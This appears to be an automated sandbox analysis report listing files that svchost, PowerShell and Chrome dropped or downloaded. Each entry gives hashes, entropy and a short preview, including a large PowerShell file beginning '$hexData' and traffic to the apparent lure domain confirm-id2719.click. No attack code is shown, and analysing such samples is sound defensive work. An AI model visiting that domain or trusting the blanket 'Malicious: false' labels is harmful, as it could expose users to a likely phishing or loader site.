MD5: E0350D9949B087FD51600DFE41D5A65A
SHA1: 66B28D2E05D43E1D650B21958EC3898B9C2BFE86
SHA-256: EF4B1C6C45672A790CECA3E6854C57445FA28A64A644DCD29146DF6ECF11284B
SHA-512: 6BFD604106271513B1A449BAD70B4B17D1C750745FC81D6C39C74D67F84C0F8C5B5025EC16CA4BFEA179BC7AF4CC70420A69277877AFC4E4508A768F40D646D5
Malicious: false
Reputation: unknown
Preview: binary data, no readable strings
Process: C:\Windows\System32\svchost.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 13139691
Entropy (8bit): 3.9704412281561168
Encrypted: false
SSDEEP:
MD5: FDE0891F0DA40825DBAD756C9BD2E2A4
SHA1: 7A1D45097B24DE106623C86C5F2672A8EC745027
SHA-256: 5249D4637BB83FE40F675AE7B0849238A808BDDB597DC8405F1F60930E2C13C2
SHA-512: 05898FB519C6451F23D7A3F0735519E064E29E1B07B47BB8C38314C6A7A5CCD08D3C441D3C6805E0D3B511672FC22E71459536512B78F636CD1D4C1D9D98F1F3
Malicious: false
Reputation: unknown
Preview: $hexData = '…
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP:
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: unknown
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\svchost.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 0
Entropy (8bit): 0.0
Encrypted: false
SSDEEP:
MD5: FDE0891F0DA40825DBAD756C9BD2E2A4
SHA1: 7A1D45097B24DE106623C86C5F2672A8EC745027
SHA-256: 5249D4637BB83FE40F675AE7B0849238A808BDDB597DC8405F1F60930E2C13C2
SHA-512: 05898FB519C6451F23D7A3F0735519E064E29E1B07B47BB8C38314C6A7A5CCD08D3C441D3C6805E0D3B511672FC22E71459536512B78F636CD1D4C1D9D98F1F3
Malicious: false
Reputation: unknown
Preview: $hexData = '…
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 0
Entropy (8bit): 0.0
Encrypted: false
SSDEEP:
MD5: E58EDDE69C91EE596560253653606165
SHA1: FEB56A4E816A21BC627BD46C1CA56A91A81E0BC8
SHA-256: 2C90D7C9AFF503CB8464C44B5738C9DF15C6F908E01F0651C7F892CBD8916967
SHA-512: E10326D46D0202FF80A66B2A9D3B4A447B0AA20730B692DE714CF23082E0479BF013F377D48D2D9B149DD41FA1EF35BD3805545323D574A229B5D322E8AC61D4
Malicious: false
Reputation: unknown
Preview: binary data; readable strings include AppData, Roaming, Microsoft, Windows, Start Menu, shell32.dll,-21786, Programs, shell32.dll,-21782, Windows PowerShell, WINDOW~1.LNK
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):6221
                                                                    Entropy (8bit):3.7352668482825373
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E58EDDE69C91EE596560253653606165
                                                                    SHA1:FEB56A4E816A21BC627BD46C1CA56A91A81E0BC8
                                                                    SHA-256:2C90D7C9AFF503CB8464C44B5738C9DF15C6F908E01F0651C7F892CBD8916967
                                                                    SHA-512:E10326D46D0202FF80A66B2A9D3B4A447B0AA20730B692DE714CF23082E0479BF013F377D48D2D9B149DD41FA1EF35BD3805545323D574A229B5D322E8AC61D4
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                    Category:downloaded
                                                                    Size (bytes):2228
                                                                    Entropy (8bit):7.82817506159911
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                    SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                    SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                    SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                                    Preview:
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max compression, from Unix, original size modulo 2^32 87533
                                                                    Category:downloaded
                                                                    Size (bytes):30336
                                                                    Entropy (8bit):7.990122995670157
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:8EC8BBC7D71DF3C7FB8F0E287D4604E0
                                                                    SHA1:F5CDED96FEDC4194CC96A9D5DA8456E4B2C02F68
                                                                    SHA-256:9D53089B72D4828A1939167117DB78DD89806F5E0658357695D4094D340483B4
                                                                    SHA-512:D31EBBCC2B5658C2EEFF3090E42A02FD7F8EB75897CC8075C16363422193175766329D786D79495A3DA5FCF86B741A04E0782D0993B461205047D5C2BDB10F0A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://code.jquery.com/jquery-3.7.1.min.js
                                                                    Preview:
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 207
                                                                    Category:downloaded
                                                                    Size (bytes):173
                                                                    Entropy (8bit):6.753851132198477
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:09B76FEC0A6398D4543898E842DD27D7
                                                                    SHA1:2247DC056F68EA8FD423DBB00BC48CB186852110
                                                                    SHA-256:593C9FDD08DBEABE419E008DC3DAA30246E318FC8DCD9AA255D0562FA5DF52ED
                                                                    SHA-512:BF1766525D688D51C6C133C813E1A2638A1A84DF872297796D87E0F2D77323E489DD8E7A4829A4B14394283CA440A1D09D2C61770BE5794AF8ECAF46CB1095EA
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://confirm-id2719.click/Reservation_files/166939781.jpg
                                                                    Preview:
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 118085
                                                                    Category:downloaded
                                                                    Size (bytes):27077
                                                                    Entropy (8bit):7.990970434572831
                                                                    Encrypted:true
                                                                    SSDEEP:
                                                                    MD5:60731C39329D94D3F2B4306F966B9686
                                                                    SHA1:0865BBFCE93A81B74AFCA98C762E5B3B8751B866
                                                                    SHA-256:2425180C2EE35BB69E602E86B2071C0F7E077F4D5CB8E1E2569681EA9F7A75BD
                                                                    SHA-512:A99BE5DEEBFCE9AE8DD7DD4E0033982648EE6E2D6F2A27A38782C54584B41DC0DBF8E538E97FCDC8B5DF8F5085F44A3E8247B9D4EEFBEC509DEC0D05DF4F046B
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://confirm-id2719.click/
                                                                    Preview:
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:gzip compressed data, max compression, truncated
                                                                    Category:downloaded
                                                                    Size (bytes):44
                                                                    Entropy (8bit):4.70297224329311
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:ABD1424E68D1EBD3571DCECCB1DC3697
                                                                    SHA1:7E08C7A02EF325DF3D80BCEB8BF1EAFA26C7E179
                                                                    SHA-256:18DF3692F2A4A1969F5EC1D8635F72C64B996F993264A6A66C0639A4C3698D1E
                                                                    SHA-512:FC43B3D5BD9A7172CB36DBE323955AFFC1D661CDB2B06B630C54A5FD213A79564FCD2CD8D8CC68FD0ABBF99AFE7F26467E654671F084A18071C1639C09FB4776
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCSdlgfoJ3vWEEgUNUopJoxIFDXk4iPchz2Mdu2E0hNY=?alt=proto
                                                                    Preview:
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):153
                                                                    Entropy (8bit):4.599963902086101
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:221C5068A9B8ABADB65566698A2E54D2
                                                                    SHA1:2F61C62B38CBA22D7FC5311D02E34D0697A31845
                                                                    SHA-256:BFB286554B24DB87B6CBCB6E68BE23F89DEE1BE4D7DB544D1E7C97C45664E0DF
                                                                    SHA-512:FFDA24061CD9DCA9F6C2CAE0FF791C478B8B85840A7753E8EEDA4709BF80F7174FEE49C3BA7EF0BA615106981CF52362B1D5F9D90C1F580231DFC3BF22D1F69C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<!doctype html>.<html lang=en>.<title>405 Method Not Allowed</title>.<h1>Method Not Allowed</h1>.<p>The method is not allowed for the requested URL.</p>.
                                                                    No static file info